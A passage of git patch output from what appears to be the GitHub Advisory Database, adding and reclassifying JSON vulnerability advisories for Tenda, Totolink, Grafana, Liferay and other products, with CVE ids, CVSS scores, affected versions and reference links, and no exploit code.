"github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json b/advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json new file mode 100644 index 0000000000000..8674c3bcdac4f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmmj-8q9v-qxh2", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-52166" + ], + "details": "Incorrect access control in Software GmbH Agorum core open v11.9.2 & v11.10.1 allows authenticated attackers to escalate privileges to Administrator and access sensitive components and information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52166" + }, + { + "type": "WEB", + "url": "https://herolab.usd.de/usd-2025-0028" + }, + { + "type": "WEB", + "url": "http://agorum.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T18:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vp3h-jvmv-7rq4/GHSA-vp3h-jvmv-7rq4.json b/advisories/unreviewed/2025/07/GHSA-vp3h-jvmv-7rq4/GHSA-vp3h-jvmv-7rq4.json new file mode 100644 index 0000000000000..30e986eb95db7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vp3h-jvmv-7rq4/GHSA-vp3h-jvmv-7rq4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp3h-jvmv-7rq4", + "modified": "2025-07-18T18:30:29Z", + "published": "2025-07-18T18:30:29Z", + "aliases": [ + "CVE-2025-47995" + ], + "details": "Weak authentication in Azure Machine Learning allows an authorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47995" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47995" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1390" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-w4fj-h985-2wx8/GHSA-w4fj-h985-2wx8.json b/advisories/unreviewed/2025/07/GHSA-w4fj-h985-2wx8/GHSA-w4fj-h985-2wx8.json new file mode 100644 index 0000000000000..7b88d0dcfb615 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-w4fj-h985-2wx8/GHSA-w4fj-h985-2wx8.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4fj-h985-2wx8", + "modified": "2025-07-18T18:30:30Z", + "published": "2025-07-18T18:30:30Z", + "aliases": [ + "CVE-2025-7794" + ], + "details": "A vulnerability classified as critical was found in Tenda FH451 1.0.0.9. Affected by this vulnerability is the function fromNatStaticSetting of the file /goform/NatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7794" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromNatStaticSetting.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromNatStaticSetting.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316855" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316855" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616318" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T17:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wvgm-rxv8-96hh/GHSA-wvgm-rxv8-96hh.json b/advisories/unreviewed/2025/07/GHSA-wvgm-rxv8-96hh/GHSA-wvgm-rxv8-96hh.json index 3db9624ec6d90..f98405cb40b18 100644 --- a/advisories/unreviewed/2025/07/GHSA-wvgm-rxv8-96hh/GHSA-wvgm-rxv8-96hh.json +++ b/advisories/unreviewed/2025/07/GHSA-wvgm-rxv8-96hh/GHSA-wvgm-rxv8-96hh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wvgm-rxv8-96hh", - "modified": "2025-07-17T18:31:13Z", + "modified": "2025-07-18T18:30:27Z", "published": "2025-07-17T18:31:13Z", "aliases": [ "CVE-2025-52046" ], "details": "Totolink A3300R V17.0.0cu.596_B20250515 was found to contain a command injection vulnerability in the sub_4197C0 function via the mac and desc parameters. This vulnerability allows unauthenticated attackers to execute arbitrary commands via a crafted request.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-17T16:15:35Z" From b6bdfe13691aedf43464bd3ed11917791d71afc2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 18:39:14 +0000 Subject: [PATCH 007/323] Publish Advisories GHSA-46m5-8hpj-p5p5 GHSA-46m5-8hpj-p5p5 --- .../GHSA-46m5-8hpj-p5p5.json | 93 +++++++++++++++++++ .../GHSA-46m5-8hpj-p5p5.json | 36 ------- 2 files changed, 93 insertions(+), 36 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json delete mode 100644 advisories/unreviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json diff --git a/advisories/github-reviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json b/advisories/github-reviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json new file mode 100644 index 0000000000000..41e1e16c01ce0 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-46m5-8hpj-p5p5", + "modified": "2025-07-18T18:37:08Z", + "published": "2025-07-17T12:30:37Z", + "aliases": [ + "CVE-2025-3415" + ], + "summary": "Grafana's insecure DingDing Alert integration exposes sensitive information", + "details": "Grafana is an open-source platform for monitoring and observability. The Grafana Alerting DingDing integration was not properly protected and could be exposed to users with Viewer permission. \nFixed in versions 10.4.19+security-01, 11.2.10+security-01, 11.3.7+security-01, 11.4.5+security-01, 11.5.5+security-01, 11.6.2+security-01 and 12.0.1+security-01", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9.2-0.20250514160932-04111e9f2afd" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3415" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/04111e9f2afd95ea3e5b01865cc29d3fc1198e71" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/0adb869188fa2b9ae26efd424b94e17189538f29" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/19c912476d4f7a81e8a3562668bc38f31b909e18" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/4144c636d1a6d0b17fafcf7a2c40fa403542202a" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/4fc33647a8297d3a0aae04a5fcbac883ceb6a655" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/910eb1dd9e618014c6b1d2a99a431b99d4268c05" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/91327938626c9426e481e6294850af7b61415c98" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/a78de30720b4f33c88d0c1a973e693ebf3831717" + }, + { + "type": "PACKAGE", + "url": "https://github.com/grafana/grafana" + }, + { + "type": "WEB", + "url": "https://grafana.com/security/security-advisories/cve-2025-3415" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T18:37:08Z", + "nvd_published_at": "2025-07-17T11:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json b/advisories/unreviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json deleted file mode 100644 index fcfb42dedfc02..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-46m5-8hpj-p5p5/GHSA-46m5-8hpj-p5p5.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-46m5-8hpj-p5p5", - "modified": "2025-07-17T12:30:37Z", - "published": "2025-07-17T12:30:37Z", - "aliases": [ - "CVE-2025-3415" - ], - "details": "Grafana is an open-source platform for monitoring and observability. The Grafana Alerting DingDing integration was not properly protected and could be exposed to users with Viewer permission. \nFixed in versions 10.4.19+security-01, 11.2.10+security-01, 11.3.7+security-01, 11.4.5+security-01, 11.5.5+security-01, 11.6.2+security-01 and 12.0.1+security-01", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3415" - }, - { - "type": "WEB", - "url": "https://grafana.com/security/security-advisories/cve-2025-3415" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-17T11:15:22Z" - } -} \ No newline at end of file From 7f8fb2d4d10d5720f54331fabcf8576c529efb8b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 19:16:34 +0000 Subject: [PATCH 008/323] Publish Advisories GHSA-7r3w-wggm-pjwf GHSA-7r3w-wggm-pjwf --- .../GHSA-7r3w-wggm-pjwf.json | 115 ++++++++++++++++++ .../GHSA-7r3w-wggm-pjwf.json | 44 ------- 2 files changed, 115 insertions(+), 44 deletions(-) create mode 100644 advisories/github-reviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json delete mode 100644 advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json diff --git a/advisories/github-reviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json b/advisories/github-reviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json new file mode 100644 index 0000000000000..e5b3b1a60d538 --- /dev/null +++ b/advisories/github-reviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json @@ -0,0 +1,115 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7r3w-wggm-pjwf", + "modified": "2025-07-18T19:15:03Z", + "published": "2022-09-23T00:00:46Z", + "aliases": [ + "CVE-2022-28979" + ], + "summary": "Liferay Portal and Liferay DXP Vulnerable to XSS in the Portal Search Module", + "details": "In Search Web before v6.0.19 in Liferay Portal (v7.1.0 through v7.4.2) and Liferay DXP 7.1 before fix pack 26, 7.2 before fix pack 15, and 7.3 before service pack 3 was discovered to contain a cross-site scripting (XSS) vulnerability in the Portal Search module's Custom Facet widget. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Parameter Name text field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay:com.liferay.portal.search.web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.0.19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 7.1.10.fp26" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 7.2.10.fp15" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28979" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/e18065248673c77927f4839439aa200bfb965ced" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://issues.liferay.com/browse/LPE-17381" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2022-28979-xss-in-custom-facet-widget?p_r_p_assetEntryId=121612377&_com_liferay_asset_publisher_web_portlet_AssetPublisherPortlet_INSTANCE_jekt_redirect=https%3A%2F%2Fliferay.dev%3A443%2Fportal%2Fsecurity%2Fknown-vulnerabilities%3Fp_p_id%3Dcom_liferay_asset_publisher_web_portlet_AssetPublisherPortlet_INSTANCE_jekt%26p_p_lifecycle%3D0%26p_p_state%3Dnormal%26p_p_mode%3Dview%26p_r_p_assetEntryId%3D121612377%26_com_liferay_asset_publisher_web_portlet_AssetPublisherPortlet_INSTANCE_jekt_cur%3D0%26p_r_p_resetCur%3Dfalse" + }, + { + "type": "WEB", + "url": "https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/cve-2022-28979-xss-in-custom-facet-widget" + }, + { + "type": "WEB", + "url": "http://liferay.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T19:15:03Z", + "nvd_published_at": "2022-09-22T00:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json b/advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json deleted file mode 100644 index 0fd0a7a716567..0000000000000 --- a/advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json +++ /dev/null @@ -1,44 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-7r3w-wggm-pjwf", - "modified": "2022-09-25T00:00:19Z", - "published": "2022-09-23T00:00:46Z", - "aliases": [ - "CVE-2022-28979" - ], - "details": "Liferay Portal v7.1.0 through v7.4.2 and Liferay DXP v7.3 before service pack 3 was discovered to contain a cross-site scripting (XSS) vulnerability in the Portal Search module's Custom Facet widget. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Parameter Name text field.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28979" - }, - { - "type": "WEB", - "url": "https://issues.liferay.com/browse/LPE-17381" - }, - { - "type": "WEB", - "url": "https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/cve-2022-28979-xss-in-custom-facet-widget" - }, - { - "type": "WEB", - "url": "http://liferay.com" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-09-22T00:15:00Z" - } -} \ No newline at end of file From ea6827c4cae4afd41ddece97ddbc56f4ab2b64e6 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 19:21:42 +0000 Subject: [PATCH 009/323] Publish Advisories GHSA-w7f2-6896-6mm2 GHSA-w7f2-6896-6mm2 --- .../GHSA-w7f2-6896-6mm2.json | 126 ++++++++++++++++++ .../GHSA-w7f2-6896-6mm2.json | 36 ----- 2 files changed, 126 insertions(+), 36 deletions(-) create mode 100644 advisories/github-reviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json delete mode 100644 advisories/unreviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json diff --git a/advisories/github-reviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json b/advisories/github-reviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json new file mode 100644 index 0000000000000..02d8be1bcc1c2 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7f2-6896-6mm2", + "modified": "2025-07-18T19:19:36Z", + "published": "2022-04-26T00:00:37Z", + "aliases": [ + "CVE-2022-26596" + ], + "summary": "Liferay Portal and Liferay DXP allows arbitrary injection via web content template names", + "details": "Cross-site scripting (XSS) vulnerability in Journal module's web content display configuration page before 5.0.15 in Liferay Portal 7.1.0 through 7.3.3, and Liferay DXP 7.0 before fix pack 94, 7.1 before fix pack 19, and 7.2 before fix pack 8, allows remote attackers to inject arbitrary web script or HTML via web content template names.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay:com.liferay.journal.content.web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.0.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.0.10.fp94" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.1.0" + }, + { + "fixed": "7.1.10.fp19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.2.10.fp8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26596" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/c61976fc867f3add8eb429b99380e91f021f9313" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2022-26596-stored-xss-with-template-name?p_r_p_assetEntryId=121612108&_com_liferay_asset_publisher_web_portlet_AssetPublisherPortlet_INSTANCE_jekt_redirect=https%3A%2F%2Fliferay.dev%3A443%2Fportal%2Fsecurity%2Fknown-vulnerabilities%3Fp_p_id%3Dcom_liferay_asset_publisher_web_portlet_AssetPublisherPortlet_INSTANCE_jekt%26p_p_lifecycle%3D0%26p_p_state%3Dnormal%26p_p_mode%3Dview%26p_r_p_assetEntryId%3D121612108%26_com_liferay_asset_publisher_web_portlet_AssetPublisherPortlet_INSTANCE_jekt_cur%3D0%26p_r_p_resetCur%3Dfalse" + }, + { + "type": "WEB", + "url": "http://liferay.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T19:19:36Z", + "nvd_published_at": "2022-04-25T16:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json b/advisories/unreviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json deleted file mode 100644 index a5dc30189c2ad..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-w7f2-6896-6mm2/GHSA-w7f2-6896-6mm2.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-w7f2-6896-6mm2", - "modified": "2022-05-07T00:01:15Z", - "published": "2022-04-26T00:00:37Z", - "aliases": [ - "CVE-2022-26596" - ], - "details": "Cross-site scripting (XSS) vulnerability in Journal module's web content display configuration page in Liferay Portal 7.1.0 through 7.3.3, and Liferay DXP 7.0 before fix pack 94, 7.1 before fix pack 19, and 7.2 before fix pack 8, allows remote attackers to inject arbitrary web script or HTML via web content template names.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26596" - }, - { - "type": "WEB", - "url": "http://liferay.com" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-04-25T16:16:00Z" - } -} \ No newline at end of file From d422aea6e1422c6862fb0abfdf5795111f03a82f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 19:33:22 +0000 Subject: [PATCH 010/323] Publish GHSA-cm99-x97g-9qx8 --- .../GHSA-cm99-x97g-9qx8.json | 41 +++++++++++++++++-- 1 file changed, 37 insertions(+), 4 deletions(-) rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json (50%) diff --git a/advisories/unreviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json b/advisories/github-reviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json similarity index 50% rename from advisories/unreviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json rename to advisories/github-reviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json index 52ef8aea8043d..dc76bde9c2349 100644 --- a/advisories/unreviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json +++ b/advisories/github-reviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-cm99-x97g-9qx8", - "modified": "2022-05-17T02:15:41Z", + "modified": "2025-07-18T19:31:56Z", "published": "2022-05-17T02:15:41Z", "aliases": [ "CVE-2017-12648" ], + "summary": "Liferay Portal XSS Vulnerability", "details": "XSS exists in Liferay Portal before 7.0 CE GA4 via a bookmark URL.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.3-GA4" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -23,9 +44,21 @@ "type": "WEB", "url": "https://github.com/brianchandotcom/liferay-portal/pull/47888" }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/996769ea1e2be15becd90a1fcf73e704788714ac" + }, + { + "type": "WEB", + "url": "https://github.com/liferay/liferay-portal/commit/9bc594b70c565570c7e7b7e06c0b7c141d2cc8cf" + }, { "type": "WEB", "url": "https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-70/-/asset_publisher/cjE0ourZXJZE/content/cst-7017-multiple-xss-vulnerabilities" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" } ], "database_specific": { @@ -33,8 +66,8 @@ "CWE-79" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-18T19:31:11Z", "nvd_published_at": "2017-08-07T16:29:00Z" } } \ No newline at end of file From e2758d98208b193149402e12919287614ed7843c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 19:36:29 +0000 Subject: [PATCH 011/323] Publish GHSA-cm99-x97g-9qx8 --- .../GHSA-cm99-x97g-9qx8.json | 21 ++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json b/advisories/github-reviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json index dc76bde9c2349..177d5870e938a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json +++ b/advisories/github-reviewed/2022/05/GHSA-cm99-x97g-9qx8/GHSA-cm99-x97g-9qx8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cm99-x97g-9qx8", - "modified": "2025-07-18T19:31:56Z", + "modified": "2025-07-18T19:33:38Z", "published": "2022-05-17T02:15:41Z", "aliases": [ "CVE-2017-12648" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay:com.liferay.frontend.taglib" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.3" + } + ] + } + ] } ], "references": [ From 7265ff9e42356d4548d1fb0e3edf7c6acaecacde Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 18 Jul 2025 19:42:56 +0000 Subject: [PATCH 012/323] Publish Advisories GHSA-8gqf-26xw-x3gx GHSA-8gqf-26xw-x3gx --- .../GHSA-8gqf-26xw-x3gx.json | 114 ++++++++++++++++++ .../GHSA-8gqf-26xw-x3gx.json | 40 ------ 2 files changed, 114 insertions(+), 40 deletions(-) create mode 100644 advisories/github-reviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json delete mode 100644 advisories/unreviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json diff --git a/advisories/github-reviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json b/advisories/github-reviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json new file mode 100644 index 0000000000000..453fb350e49cd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8gqf-26xw-x3gx/GHSA-8gqf-26xw-x3gx.json @@ -0,0 +1,114 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gqf-26xw-x3gx", + "modified": "2025-07-18T19:40:46Z", + "published": "2022-05-17T02:15:41Z", + "aliases": [ + "CVE-2017-12646" + ], + "summary": "Liferay Portal XSS Vulnerability ", + "details": "Cross-site scripting (XSS) exists in Liferay Portal before 7.0 CE GA4 via a login name, password, or e-mail address.", + "severity": [ + { + "type": 